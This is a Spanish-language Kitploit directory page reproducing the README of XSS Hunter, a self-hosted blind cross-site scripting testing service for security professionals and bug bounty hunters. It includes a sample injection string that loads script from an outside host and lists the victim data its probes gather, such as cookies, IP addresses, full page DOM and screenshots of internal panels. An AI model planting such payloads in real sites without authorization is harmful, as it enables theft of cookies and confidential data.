Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
xsshunter — El servicio XSS Hunter - una versión portátil de XSSHunter.com | Kitploit
Herramientas/GitHubGitHub/mandatoryprogrammer/xsshunter
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmandatoryprogrammer/xsshunter

xsshunter

El servicio XSS Hunter - una versión portátil de XSSHunter.com

Ver Repositorio
1.6k303hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

OBSOLETO - PRUEBA LA NUEVA VERSIÓN EXPRESS

Ver aquí para más información: https://github.com/mandatoryprogrammer/xsshunter-express

Código Fuente de XSS Hunter

Esta es una versión portátil del código fuente que se ejecuta en https://xsshunter.com. Está diseñada para instalarse fácilmente en cualquier servidor para profesionales de seguridad y cazadores de recompensas que deseen probar XSS de una manera mucho más poderosa.

Si no deseas configurar este software y prefieres empezar a probar directamente, consulta https://xsshunter.com .

Requisitos

  • Un servidor que ejecute (preferiblemente) Ubuntu.
  • Una cuenta de Mailgun, para enviar correos de activación de payload XSS.
  • Un nombre de dominio, preferiblemente corto para reducir el tamaño del payload. Aquí hay un buen sitio web para encontrar nombres de dominio de dos letras: https://catechgory.com/. Mi dominio es xss.ht por ejemplo.
  • Un certificado SSL comodín, aquí hay uno barato. Esto es necesario porque XSS Hunter identifica a los usuarios por sus subdominios y todos deben tener SSL habilitado. No podemos usar Let's Encrypt porque no admiten certificados comodín. Me abstendré de insultar el modelo de negocio de las AC, pero ten la seguridad de que es muy absurdo y les cuesta muy poco emitirte un certificado comodín, así que elige el proveedor más barato que encuentres (siempre que sea compatible con todos los navegadores).

Configuración

Por favor, consulta https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ para obtener información sobre cómo configurar XSS Hunter en tu propio servidor.

Resumen de Funcionalidad

Al registrarte, crearás un dominio corto especial como yoursubdomain.xss.ht que identifica tus vulnerabilidades XSS y aloja tu payload. Luego usas este subdominio en tus pruebas XSS, utilizando intentos de inyección como "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter servirá automáticamente sondas XSS y recopilará la información resultante cuando se activen.

Características

  • Activaciones de payload XSS gestionadas: Gestiona todos tus payloads XSS en el panel de control de tu cuenta de XSS Hunter.
  • Sondas XSS potentes: La siguiente información se recopila cada vez que una sonda se activa en una página vulnerable:
    • La URI de la página vulnerable
    • Origen de ejecución
    • La dirección IP de la víctima
    • El referer de la página
    • El User Agent de la víctima
    • Todas las cookies no HTTP-Only
    • El DOM HTML completo de la página
    • Captura de pantalla completa de la página afectada
    • Solicitud HTTP responsable (si se utiliza una herramienta compatible con XSS Hunter)
  • Capturas de pantalla completas de página: Las sondas de XSS Hunter utilizan la API de canvas HTML5 para generar una captura de pantalla completa de la página vulnerable en la que se ha activado un payload XSS. Con esta función, puedes echar un vistazo a paneles administrativos internos, mesas de ayuda, sistemas de registro y otras aplicaciones web internas. Esto permite generar informes más potentes que muestren el impacto completo de la vulnerabilidad a tu cliente o programa de recompensas.
  • Generación de informes en Markdown: Cada informe de payload XSS viene con un informe markdown pregenerado. Estos informes generados también son compatibles con otras plataformas que admiten markdown, como Phabricator, para facilitar la notificación de errores en los sistemas de tickets de la empresa.
  • Informes por correo de activación de payload XSS: Las activaciones de payload XSS también envían informes detallados por correo electrónico que se pueden reenviar fácilmente a los contactos de seguridad adecuados para reportar errores críticos de forma sencilla.
  • Generación automática de payloads: XSS Hunter genera automáticamente payloads XSS para que los uses en tus pruebas de seguridad de aplicaciones web.
  • Inyecciones correlacionadas: Quizás la característica más potente de XSS Hunter es la capacidad de correlacionar intentos de inyección con activaciones de payload XSS. Al usar una herramienta de prueba compatible con XSS Hunter, puedes saber inmediatamente qué causó que un payload específico se activara (¡incluso semanas después del intento de inyección!).
  • Cifrado PGP opcional para correos de payload: ¿Eres muy paranoico? Está disponible el cifrado PGP del lado del cliente, que cifrará todos los datos de inyección en el navegador de la víctima antes de enviarlos al servicio XSS Hunter.
  • Captura de páginas: Cuando tu payload XSS se active, puedes especificar una lista de rutas relativas para que el payload las recupere y almacene automáticamente. Esto es útil para encontrar otras vulnerabilidades, como políticas crossdomain.xml incorrectas en sistemas internos a los que normalmente no se podría acceder.
  • Carga de payload secundario: ¿Tienes un payload secundario que quieras cargar después de que XSS Hunter haya hecho su trabajo? XSS Hunter te ofrece la opción de especificar un payload JavaScript secundario para ejecutar después de que haya completado su recopilación.
  • Aplicación web iOS: También es posible ver tus activaciones de payload XSS a través de una aplicación web iOS. Simplemente navega a la ruta /app y guarda la página como una aplicación web en el escritorio de tu iPhone.

Exploits Notables

  • XSS ciego en la herramienta de servicio interna de Tesla: https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
  • XSS ciego en la integración de Salesforce de Spotify: https://mhmdiaa.github.io/blind-xss-in-spotify/
  • XSS ciego en el panel de soporte de GoDaddy: https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

¿Quieres Contribuir?

Todo el código fue creado por mí y (por esa razón) probablemente no sea una buena práctica y definitivamente necesita optimización/limpieza. ¡Cualquier pull request es bienvenido!

Descargar herramienta